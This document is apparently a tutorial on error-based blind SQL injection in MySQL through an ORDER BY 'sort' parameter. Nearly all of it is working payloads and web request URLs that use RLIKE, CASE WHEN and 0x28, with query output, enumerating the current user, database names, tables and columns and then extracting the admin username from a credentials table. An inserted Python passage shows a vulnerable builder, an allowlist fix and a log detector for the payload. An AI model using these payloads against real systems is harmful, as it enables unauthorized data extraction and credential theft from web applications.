0x00 Memory aid
select * from test order by 1 RLIKE (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)
When 1=1 is true the CASE returns 1 and the page stays unchanged.
When 1=2 is false the CASE returns 0x28, which is the hex literal for '(' and not a valid regular expression, so the page throws an error.
This difference is what tells you whether the condition held.
0x01 Basic data
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.27 sec)
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select database();
+------------+
| database() |
+------------+
| test |
+------------+
1 row in set (0.00 sec)
mysql> select * from test;
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
mysql> select * from tdb_admin;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
0x02 Reading the database version / current user / current database
The same pattern reads different content by changing the condition.
For example:
substring(user(),1,1) = 'r'
substring(user(),2,1) = 'o'
Web request: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring(user(),1,1)='r') THEN 1 ELSE 0x28 END)
Database query: select * from test order by 1 RLIKE (CASE WHEN (substring(user(),1,1)='r') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring(user(),1,1)='r') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
If the guess is right, the page stays unchanged.
If it is wrong, the page throws an error or returns no data.
0x03 Guessing database names
Note: changing the offset in LIMIT 0 returns other database names.
For example:
LIMIT 0,1 with offset 0 returns the 1st database
LIMIT 1,1 with offset 1 returns the 2nd database
// Demo data
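As an added defender-side example that is not part of the original post: the Python below shows the pattern behind the page's ?sort= injection (the request value pasted into ORDER BY) beside an allowlisted ORDER BY builder, and a check that flags the RLIKE / CASE WHEN payload in access-log lines. The table and column names come from the page's demo data; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

TABLE = "test"
COLUMNS = ("id", "test", "map", "content")  # the page's demo table

def order_by_vulnerable(sort_param: str) -> str:
    # The pattern behind the page's ?sort= injection: the request value is pasted
    # straight into ORDER BY, so "1 RLIKE (CASE WHEN ... END)" becomes part of the query.
    return f"SELECT * FROM {TABLE} ORDER BY {sort_param}"

def order_by_safe(sort_param: str) -> str:
    # ORDER BY cannot take a bound parameter for the column, so the request value is
    # mapped onto a fixed allowlist (column name or 1-based position); anything else
    # is rejected before it reaches the database.
    value = sort_param.strip().lower()
    if value.isdigit() and 1 <= int(value) <= len(COLUMNS):
        value = COLUMNS[int(value) - 1]
    if value not in COLUMNS:
        raise ValueError(f"rejected sort parameter: {sort_param!r}")
    return f"SELECT * FROM {TABLE} ORDER BY {value}"

# Markers of the technique on the page: RLIKE/REGEXP followed by a CASE expression,
# or the 0x28 literal used to force the regex error.
INJECTION_RE = re.compile(r"\b(rlike|regexp)\b[\s\S]*\bcase\s+when\b|\b0x28\b", re.IGNORECASE)

def suspicious_sort_values(log_lines):
    """Return the decoded ?sort= values of access-log lines that match INJECTION_RE."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if not m:
            continue
        for value in parse_qs(urlsplit(m.group(1)).query).get("sort", []):
            if INJECTION_RE.search(value):
                hits.append(value)
    return hits

# Constructed sample access-log lines (not from the page); the second and third carry
# the page's payload for a right and a wrong guess, the wrong one answered with a 500.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sql.php?sort=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql.php?sort=1%20RLIKE%20(CASE%20WHEN%20'
    '(substring(user(),1,1)=%27r%27)%20THEN%201%20ELSE%200x28%20END) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sql.php?sort=1%20RLIKE%20(CASE%20WHEN%20'
    '(substring(user(),1,1)=%27x%27)%20THEN%201%20ELSE%200x28%20END) HTTP/1.1" 500 0',
]
```

A run of right/wrong guesses shows up in the log as repeated sort values differing by one character, with the wrong guesses answered by errors or empty pages, which is the signal to alert on.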
mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.00 sec)
Web request: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='i') THEN 1 ELSE 0x28 END)
Reading the first character of the 1st database name: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='i') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='i') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
Reading the second character of the 1st database name: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)='n') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)='n') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
0x04 Guessing table names
Note: changing table_schema=xxx to another database returns that database's tables.
For example:
table_schema=database() returns the tables of the currently connected database
table_schema='test' returns the tables of the test database
Note: changing the offset in LIMIT 0 returns different table names.
For example:
LIMIT 0,1 with offset 0 returns the 1st table
LIMIT 1,1 with offset 1 returns the 2nd table
// Demo data
mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
+------------+
| table_name |
+------------+
| tdb_admin |
+------------+
1 row in set (0.00 sec)
Web request: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)='t') THEN 1 ELSE 0x28 END)
Database query, reading the first character of the first table name in the current database: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)='t') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)='t') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
Database query, reading the second character of the first table name in the current database: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
0x05 Guessing column names
table_schema = 'xx' is the database to enumerate
table_name = 'xx' is the table to enumerate
limit 0 is the position to enumerate
For example:
The columns of table tdb_admin are id, username, password
limit 0 = id
limit 1 = username
limit 2 = password
// Demo data
mysql> SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1;
+-------------+
| column_name |
+-------------+
| id |
+-------------+
1 row in set (0.00 sec)
Web request: http://www.test.com/sql.php?sort=1
Guessing the first character of the first column name of table tdb_admin in database test: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),1,1)='i') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),1,1)='i') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.01 sec)
Guessing the second character of the first column name of table tdb_admin in database test: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.01 sec)
0x06 Guessing contents
Note: the offset in limit 0 selects which row to read
limit 0 is the first row
limit 1 is the second row
mysql> SELECT username FROM test.tdb_admin limit 0,1;
+----------+
| username |
+----------+
| admin |
+----------+
1 row in set (0.00 sec)
Web request (字段名 stands for the column name, 库名.表名 for database.table): http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)='a') THEN 1 ELSE 0x28 END)
Reading the first character of a column in a given database and table: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)='a') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT username FROM test.tdb_admin limit 0,1),1,1)='a') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)
Reading the second character of a column in a given database and table: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT username FROM test.tdb_admin limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+----+------+------+---------+
3 rows in set (0.00 sec)